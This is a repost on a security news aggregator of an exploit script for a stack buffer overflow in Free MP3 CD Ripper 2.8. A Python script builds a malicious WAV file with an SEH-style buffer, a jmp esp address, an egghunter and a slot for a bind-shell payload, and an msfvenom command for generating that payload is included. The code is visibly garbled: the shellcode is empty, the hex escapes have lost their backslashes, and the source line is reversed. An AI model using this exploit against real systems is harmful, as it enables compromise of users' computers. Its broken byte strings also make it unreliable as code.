HackDig : Dig high-quality web security articles for hackers

Free MP3 CD Ripper 2.8 Stack Buffer Overflow (SEH + Egghunter)

2020-08-06 05:19
# Exploit Title: Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter)
# Date: 2020-07-22
# Exploit Author: Eduard Palisek
# Vendor Homepage: https://www.cleanersoft.com
# Software Link: https://www.cleanersoft.com/download/FMCRSetup.exe
# Version: 2.8 Build 20140611
# Tested on: [Windows XP, Professional, Version 2002, SP 3

#!/usr/bin/python

file = open("exploit.wav", "wb")

# msfvenom -p windows/shell_bind_tcp LPORT=9001 -a x86 EXITFUNC=thread -e x86/shikata_ga_nai -b "x00x0ax0d" -f python -v shellcode_bind
shellcode_bind =  b""

egghunter = "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x57x30x30x54x8bxfaxafx75xeaxafx75xe7xffxe7"

nops  = "x90" * 30
junk1 = "A" * 2112
tag   = "W00TW00T"
junk2 = "B" * (2000-len(shellcode_bind+nops+tag))
eip   = "x53x93x42x7e"   # 0x7e429353 : jmp esp in user32.dll

buffer  = junk1 + tag + nops + shellcode_bind + junk2 + eip + nops + egghunter

file.write(buffer)
file.close()


Source: 2300800202-BLW/eussi/moc.ytirucesxc
